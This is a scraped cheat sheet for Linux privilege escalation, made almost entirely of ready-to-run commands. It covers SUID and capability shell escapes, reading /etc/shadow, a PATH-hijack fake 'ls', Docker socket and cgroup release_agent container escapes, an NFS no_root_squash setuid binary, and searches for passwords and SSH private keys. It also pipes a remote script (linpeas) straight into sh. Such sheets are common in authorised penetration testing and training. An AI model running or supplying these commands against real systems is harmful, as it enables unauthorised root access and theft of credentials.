Linux Privilege Escalation

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

# OS version and kernel
uname -a
cat /etc/os-release
cat /etc/issue
lsb_release -a

# Current user and groups
id
whoami
groups

# All users
cat /etc/passwd
cat /etc/shadow  # if readable

# Sudo permissions
sudo -l

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

# All processes
ps aux
ps -ef

# Process tree
pstree -p

# Processes by user
ps -u root
ps -u <username>

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# Find all SUID files
find / -perm -4000 -type f 2>/dev/null

# Find all SGID files
find / -perm -2000 -type f 2>/dev/null

# Find both SUID and SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null

# Writable SUID binaries
find / -perm -4000 -type f -writable 2>/dev/null

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

# GTFOBins - check for exploitable SUID binaries
# https://gtfobins.github.io/

# Example: find with SUID
find . -exec /bin/sh -p \; -quit

# Example: vim with SUID
vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

# Example: nmap (older versions)
nmap --interactive
!sh

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

# Find files with capabilities
getcap -r / 2>/dev/null

# Common capability exploits
# CAP_SETUID
./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# CAP_DAC_READ_SEARCH (read any file)
./tar -cvf shadow.tar /etc/shadow
./tar -xvf shadow.tar

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

# System-wide cron
cat /etc/crontab
ls -la /etc/cron.*

# User cron
crontab -l
crontab -u <user> -l

# Check for writable cron scripts
ls -la /etc/cron.d/
ls -la /var/spool/cron/crontabs/

# Monitor for new processes (pspy)
./pspy64 -pf -i 1000

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# World-writable files
find / -writable -type f 2>/dev/null | grep -v proc

# World-writable directories
find / -writable -type d 2>/dev/null

# Files owned by current user
find / -user $(whoami) 2>/dev/null

# Writable /etc files
find /etc -writable -type f 2>/dev/null

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

# Check current PATH
echo $PATH

# Find writable directories in PATH
echo $PATH | tr ':' '\n' | while read dir; do [ -w "$dir" ] && echo "$dir is writable"; done

# Create malicious binary
cd /writable/path/in/PATH
echo '#!/bin/bash' > ls
echo '/bin/bash -p' >> ls
chmod +x ls

# Wait for privileged process to call 'ls'

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# Check kernel version
uname -r
uname -a

# Search for kernel exploits
searchsploit linux kernel $(uname -r)

# Common kernel exploits
# DirtyCow (CVE-2016-5195) - kernel < 4.8.3
# Dirty Pipe (CVE-2022-0847) - kernel 5.8 - 5.16.11
# PwnKit (CVE-2021-4034) - polkit

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

# Search for passwords in files
grep -r "password" /home 2>/dev/null
grep -r "pass" /var/www 2>/dev/null
grep -r "pwd" /etc 2>/dev/null

# Search in history files
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.nano_history

# Search in config files
find / -name "*.conf" -exec grep -i "password" {} \; 2>/dev/null
find / -name "*.config" -exec grep -i "password" {} \; 2>/dev/null

# Database files
locate password | more
locate pass | more

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

# Find SSH private keys
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
find / -name authorized_keys 2>/dev/null

# Check SSH directory permissions
ls -la ~/.ssh/

# Writable authorized_keys
find / -name authorized_keys -writable 2>/dev/null

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

# Check if inside container
cat /proc/1/cgroup | grep docker
ls -la /.dockerenv

# Docker socket mounted
ls -la /var/run/docker.sock

# Escape via docker socket
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Privileged container escape
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

# Check NFS exports
cat /etc/exports
showmount -e <target>

# Mount NFS share
mkdir /tmp/nfs
mount -t nfs <target>:/share /tmp/nfs

# no_root_squash exploit
# On attacker machine:
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/pe.c
gcc /tmp/pe.c -o /tmp/nfs/pe
chmod +s /tmp/nfs/pe

# On target:
/tmp/nfs/pe

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh

# Linux Smart Enumeration
./lse.sh -l 1

# Linux Exploit Suggester
./linux-exploit-suggester.sh

# pspy (monitor processes)
./pspy64

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

# Find files modified in last 10 minutes
find / -mmin -10 2>/dev/null

# Find files by extension
find / -name "*.txt" 2>/dev/null

# Check for interesting files
find / -name "*.bak" -o -name "*.old" -o -name "*.backup" 2>/dev/null

# Readable /etc/shadow
[ -r /etc/shadow ] && echo "Shadow file is readable!"

# Check sudo version (for CVE-2021-3156)
sudo -V | head -1